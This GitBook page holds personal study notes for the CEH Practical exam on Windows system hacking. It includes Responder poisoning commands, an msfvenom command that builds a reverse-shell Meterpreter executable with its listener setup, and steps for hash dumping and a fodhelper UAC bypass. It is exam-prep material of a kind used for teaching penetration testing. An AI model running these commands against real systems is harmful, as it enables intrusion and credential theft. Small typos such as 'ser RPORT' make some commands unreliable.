Book of Eopi
  • 😍About the Author
  • πŸ€–ChatGPT for Cybersecurity
  • πŸ“˜CERTIFICATIONS
    • Certified Ethical Hacker (C|EH)(Practical)
      • Reconnaissance (Footprinting)
      • Scanning Networks
      • Vulnerability Analysis
      • System Hacking
      • Sniffing
      • SQL Injection
      • Remote code execution
      • Hacking Web Applications & Servers
        • Local and remote file inclusion
        • File upload bypass
        • Cross-site scripting
        • Cross-site request forgery
        • Server-side request forgery
      • Exploitation
        • Working with exploits
        • Password cracking
        • Metasploit
        • Buffer overflow
      • Cloud Computing
      • Cryptography
      • Mobile Pentesting Resources
      • Learning resources
  • 🏁My Hacking Materials
    • My Most Frequently Used Hacking Commands
    • RickdiculouslyEasy: 1 VulnHub WriteUp
    • Corrosion: 2 VulnHub WriteUp
    • Hackable: 3 VulnHub WriteUp
    • Empire: LupinOne Vulnhub WriteUp
  • 🐧101 Labs for Linux
    • πŸ’»Hardware and System Configuration
      • LAB 1 - Boot Sequence
  • πŸ”§Mod Nintendo Switch Game
    • πŸ”ΉPokΓ©mon Brilliant Diamond and Shining Pearl
      • πŸŸ₯Install mods on Nintendo Switch
      • 🟦Install mods on Yuzu/Ryujinx Emulator
      • πŸ” Custom font for PokΓ©mon BDSP
  • πŸ“–SHARE TΓ€I LIỆU NVSP
    • 1️⃣HỌC PHαΊ¦N 1
    • 2️⃣HỌC PHαΊ¦N 2
    • 3️⃣HỌC PHαΊ¦N 3
    • 4️⃣HỌC PHαΊ¦N 4
    • 5️⃣HỌC PHαΊ¦N 5 (chΖ°a hoΓ n thiện)
    • 6️⃣HỌC PHαΊ¦N 6
  • βš”οΈTα»•ng Hợp VΓ΅ LΓ’m 2
    • πŸ’°Server JX2 2014 - BαΊ£n Kinh Doanh
    • πŸ‘‘Server JX2 2014 - PhiΓͺn bαΊ£n Offline
    • πŸ‘‘Server JX2 2017 - PhiΓͺn BαΊ£n Offline
    • πŸ‘‘Server JX2 2021 - PhiΓͺn BαΊ£n Offline
Powered by GitBook
On this page
  • Introduction
  • NTLM
  • Responder
  • Cracking NTLM Hash using John-The-Ripper
  • Backdoor Using Metasploit
  • PowerSploit
  • Armitage
  • Hacking Microsoft office with Macro
  • Privesc Windows Machine using BeRoot
  1. CERTIFICATIONS
  2. Certified Ethical Hacker (C|EH)(Practical)

System Hacking

Welcome to the System Hacking module. This note will guide you thru all the methodologies that I used while preparing for the CEH (Practical) exam.

PreviousVulnerability AnalysisNextSniffing

Last updated 2 years ago

Introduction

System hacking is defined as the compromise between computer systems and software to access the target computer and steal or misuse its sensitive information. The malware and the attacker identify and exploit the vulnerability of the computer system to gain unauthorized access.

Steps involved in System Hacking

  1. Gaining Access

  2. Escalation Privileges

  3. Maintaining Access

  4. Clearing Logs

NTLM

Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users' identities and protect the integrity and confidentiality of their activity.

Responder

The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behaviour. You can set the -r option via the command line if you want to answer the Workstation Service request for a name suffix.

chmod +x Responder.py
sudo ./Responder.py -I eth0
Responder.py -I eth0 -dwrv

Cracking NTLM Hash using John-The-Ripper

John the Ripper is a free, open-source password cracking and recovery security auditing tool available for most operating systems. It has a bunch of passwords in both raw and hashed format. Now to crack the password, John the Ripper will identify all potential passwords in a hashed format.

Backdoor Using Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7.

Crafting Windows executable through MSFVenom

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=YOUR-IP-ADDRESS LPORT=ANY-FREE-PORT -o /root/Desktop/virus.exe

Setting up reverse listener using msfconsole

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR-IP-ADDRESS
ser RPORT ANY-FREE-PORT
exploit

PowerSploit

PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:

Must Read this tutorial

Armitage

Armitage is a fantastic Java-based GUI front-end for the Metasploit Framework developed by Raphael Mudge. Its goal is to help security professionals better understand hacking and help them realize the power and potential of Metasploit.

Hacking Microsoft office with Macro

Privesc Windows Machine using BeRoot

Steps you can replicate

  1. Upload the BeRoot.exe into the Machine through Reverse Shell

  2. Interact to the win shell.

  3. BeRoot.exe

  4. Run post/windows/gather/smart_hashdump

  5. to get System prev to try to use "getsystem -t 1" If it responds negative then follow the next step

  6. Let's try another exploit. "use exploit/windows/local/bypassuac_fodhelper" and set the session into that exploit.

  7. After exploit try to run "getuid" "getsystem -t 1" "getuid"

  8. Run post/windows/gather/smart_hashdump

Other Methodology:

Responder is an LLMNR, NBT-NS, and MDNS poisoner. It will answer specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: ). By default, the tool will only respond to File Server Service requests, which are for SMB.

Armitage screenshot

BeRoot Project is a post-exploitation tool to check common misconfigurations to find a way to escalate our privilege. It has been added to the project as a post-exploitation module (so it will be executed in memory without touching the disk). This tool does not realize any exploitation. Its main goal is not to realize a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found as a potential way to escalate our privilege.

πŸ“˜
http://support.microsoft.com/kb/163409
pupy
LM, NTLM, Net-NTLMv2, oh my!Medium
This Medium Post might give you an idea about NTLM Hashes
GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.GitHub
Gaining Credentials Easily with Responder ToolMedium
This migh be useful! Give a read
Logo
GitHub - openwall/john: John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAsGitHub
John The Ripper Hash Formatspentestmonkey
GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation FrameworkGitHub
471KB
jtr-cheat-sheet.pdf
pdf
https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf
Hack Like a Pro: How to Use PowerSploit, Part 1 (Evading Antivirus Software)WonderHowTo
GitHub - r00t0v3rr1d3/armitage: Fork from @rsmudge/armitageGitHub
Armitage Homepage
https://www.yeahhub.com/exploit-windows-malicious-ms-office-file-metasploit-frameworkwww.yeahhub.com
GitHub - AlessandroZ/BeRoot: Privilege Escalation Project - Windows / Linux / MacGitHub
Bypassing Windows 10 UAC with PythonMedium
Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key) - Hacking ArticlesHacking Articles
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo